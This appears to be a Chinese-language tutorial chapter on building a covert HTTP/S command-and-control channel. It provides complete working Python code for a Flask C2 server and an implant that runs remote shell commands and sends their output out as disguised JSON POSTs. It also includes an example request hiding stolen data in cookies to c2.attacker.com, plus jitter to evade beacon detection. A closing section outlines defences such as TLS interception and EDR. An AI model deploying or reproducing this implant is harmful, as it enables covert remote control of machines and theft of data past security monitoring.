摘要:在本文中,我们将构建一个更高级、更隐蔽的C2(命令与控制)隐蔽通道——HTTP/S隧道。与DNS隧道相比,HTTP/S隧道的挑战在于,它必须**“融入(Blend In)”到海量的、看似正常的Web流量中,以规避WAF、DLP(数据防泄露)和NIDS(网络入侵检测系统)的内容审查**。我们将使用和
Flask库,分别构建一个C2服务器和客户端(Implant),演示如何将“外泄数据”伪装成合法的JSON POST请求体或HTTP头部(如
requests)进行上行;以及如何将“下发命令”隐藏在自定义的HTTP响应头中进行下行。最后,我们将讨论信标(Beaconing)模式和抖动(Jitter)技术,以规避基于“心跳”周期的行为分析。
User-Agent
关键词:Python, 隐蔽通道, C2, HTTP, HTTPS, 流量伪装, Beaconing, Jitter, ,
Flask
requests
正文
⚠️ 警告:高风险技术,仅用于合法研究与红蓝对抗
高风险:HTTP/S C2是当今恶意软件和APT(高级持续性威胁)最主流的通信方式。
环境:本文所构建的工具,只能在完全隔离和授权的网络环境中进行实验。在任何未经授权的网络中运行此工具,都将被视为恶意攻击行为。
1. 为什么是HTTP/S?——“大隐隐于市”
在一个戒备森严的企业网络中,防火墙可能会拦截所有非标准的出站端口(如SSH, FTP, DNS隧道)。但是,有两个端口是永远开放的: 和
80 (HTTP)。如果企业不开放这两个端口,员工就无法浏览网页,业务也会中断。
443 (HTTPS)
这就为攻击者提供了最完美的伪装。
挑战:与DNS不同,HTTP/S流量会经过**应用层防火墙(WAF)和DLP(数据防泄露)**系统的深度内容检查。我们不能再像DNS隧道那样发送“乱码”(高熵的Base64)。
策略(Traffic Blending):我们的C2通信,必须**“伪装”得看起来像一个正常**的Web应用在与后端API交互。例如,伪装成一个“天气插件”在更新数据,或者一个“统计脚本”在上报用户行为。
2. “伪装”的艺术:设计C2协议
a) 上行:数据外泄 (Client -> C2) 我们必须避免使用这种一眼就能看出的恶意URL。
GET /c2.php?data=...
“好”的伪装(POST JSON):
端点 (Endpoint): (看起来像一个合法的API)
POST /api/v1/user/metrics/sync
内容 (Body):将我们的数据(例如,的执行结果)进行Base64编码,然后封装在一个看似无害的JSON结构中。
"whoami"
JSON
{
"session_id": "abc-123-xyz",
"metrics_data": "d2hvYW1pIC0gYWRtaW4K...", // Base64("whoami - admin
...")
"timestamp": 1668512400
}
“更好”的伪装(Header):
端点: (一个看起来100%无害的请求)
GET /static/js/jquery.min.js
内容:将数据隐藏在HTTP头部中。
HTTP
GET /static/js/jquery.min.js HTTP/1.1
Host: c2.attacker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Cookie: session=...; data=c2VjcmV0X2RhdGE=...
WAF和DLP系统很难将中的一段Base64字符串与恶意行为关联起来。
Cookie
b) 下行:命令下发 (C2 -> Client)
“好”的伪装(自定义响应头):
响应体 (Body):返回一个真实的、无害的响应(例如,一个空白的1×1像素GIF,或者一个空的JSON
200 OK)。
{"status": "ok"}
命令:将真正的命令(例如)进行Base64编码,隐藏在一个自定义的响应头中。
"ls -l"
HTTP
HTTP/1.1 200 OK
Content-Type: application/json
X-C2-Command: bHMtIGwK
{"status": "ok"}
“更好”的伪装(隐写):
C2服务器返回一张真实的图片(),但将命令隐藏在图片的**L-SB(最低有效位)或元数据(EXIF)**中。这需要客户端和服务端都具备隐写能力。
.png
3. 代码实现:
Flask (C2) +
requests (Implant)
Flask
requests
我们将实现一个**“POST JSON上行”和“自定义头下行”**的C2。
(C2服务器)
http_c2_server.py
Python
# http_c2_server.py
from flask import Flask, request, make_response, jsonify
import base64
import time
app = Flask(__name__)
# C2命令队列 (在真实应用中,这会是一个数据库或Redis)
# 格式: { "agent_id": ["command1", "command2"] }
command_queue = {
"agent_001": ["whoami", "uname -a"]
}
# --- 1. 上行 (数据外泄) 接口 ---
# 伪装成一个合法的“同步”API
@app.route("/api/v1/metrics/sync", methods=['POST'])
def sync_data():
try:
data = request.json
agent_id = data.get('session_id')
encoded_result = data.get('metrics_data')
# 解码并打印“窃取”到的数据
decoded_result = base64.b64decode(encoded_result).decode('utf-8', 'ignore')
print("
" + "="*50)
print(f"[*] 收到来自Agent '{agent_id}' 的数据:")
print(decoded_result.strip())
print("="*50)
# 响应一个看似无害的"ok"
return jsonify({"status": "synced"})
except Exception as e:
print(f"[!] /sync 接口出错: {e}")
return jsonify({"status": "error"}), 400
# --- 2. 下行 (命令下发) 接口 ---
@app.route("/api/v1/config/heartbeat", methods=['GET'])
def get_command():
# 假设Agent通过Header表明身份
agent_id = request.headers.get('X-Agent-ID', 'default_agent')
command = "sleep:30" # 默认命令:休眠30秒
# 从队列中取一个命令
if agent_id in command_queue and command_queue[agent_id]:
command = command_queue[agent_id].pop(0)
print(f"[*] Agent '{agent_id}' 正在check-in...")
print(f" -> 正在下发命令: {command}")
# 将命令编码后放入自定义响应头
encoded_command = base64.b64encode(command.encode()).decode()
response = make_response(jsonify({"status": "ok"}))
response.headers['X-Refresh-Command'] = encoded_command
return response
if __name__ == "__main__":
# 在公网上,你应该使用Gunicorn + Nginx + HTTPS
# 为测试,我们直接运行 (允许0.0.0.0访问)
app.run(host="0.0.0.0", port=80, debug=False)
(Implant客户端)
http_implant_client.py
Python
# http_implant_client.py
import requests
import base64
import time
import subprocess
import random
C2_URL = "http://127.0.0.1" # 替换为C2服务器的真实IP或域名
AGENT_ID = "agent_001"
# 伪装成一个合法的User-Agent
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36',
'X-Agent-ID': AGENT_ID
}
def send_data(data: str):
"""上行:将数据POST到C2"""
try:
payload = {
"session_id": AGENT_ID,
"timestamp": int(time.time()),
"metrics_data": base64.b64encode(data.encode()).decode()
}
requests.post(f"{C2_URL}/api/v1/metrics/sync", json=payload, headers=HEADERS, timeout=10)
print("[Client] 数据已上报。")
except requests.RequestException as e:
print(f"[Client] 上报失败: {e}")
def get_command():
"""下行:从C2获取命令"""
try:
res = requests.get(f"{C2_URL}/api/v1/config/heartbeat", headers=HEADERS, timeout=10)
encoded_command = res.headers.get('X-Refresh-Command')
if encoded_command:
command = base64.b64decode(encoded_command).decode()
return command
except requests.RequestException:
pass
return "sleep:30" # 默认
def run_command(command):
try:
output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
return output.decode('utf-8', 'ignore')
except Exception as e:
return f"命令执行失败: {e}"
def main_loop():
sleep_time = 30 # 默认信标间隔
while True:
command = get_command()
if command.startswith("sleep:"):
# C2可以动态调整我们的休眠时间
try:
sleep_time = int(command.split(':', 1)[1])
except:
sleep_time = 30
elif command:
print(f"[Client] 收到命令: {command}")
output = run_command(command)
send_data(f"--- Output of '{command}' ---
{output}")
# Jitter: 在基础休眠时间上增加一个随机抖动
jitter = random.uniform(0, 0.2 * sleep_time) # 增加0-20%的随机抖动
total_sleep = sleep_time + jitter
print(f"[Client] 休眠 {total_sleep:.2f} 秒...")
time.sleep(total_sleep)
if __name__ == "__main__":
main_loop()
4. 总结与防御
我们成功地构建了一个基于HTTP/S的隐蔽C2通道。
流量伪装(Blending):它模拟了合法的API流量(JSON POST, GET)。
信标(Beaconing):客户端以为周期,定期“回家”签到。
sleep_time
抖动(Jitter):通过增加随机延迟,使得信标周期不固定,极大地增加了NIDS(网络入侵检测系统)通过“心跳分析”来发现它的难度。
防御(Blue Team):
SSL/TLS解密:这是唯一的、最有效的网络层防御。企业必须在边界(出口)部署HTTPS拦截代理,解密所有出站的443流量,才能让WAF和DLP有机会“看到”我们隐藏在JSON和Header中的恶意内容。
EDR(端点检测与响应):在上一章(第4.2.1节)中,我们构建了EDR。它会发现一个“可疑”的Python进程,在后台周期性地发起网络连接。
IoC封禁:一旦C2的域名或IP()被发现,立即将其封禁。
C2_URL


















暂无评论内容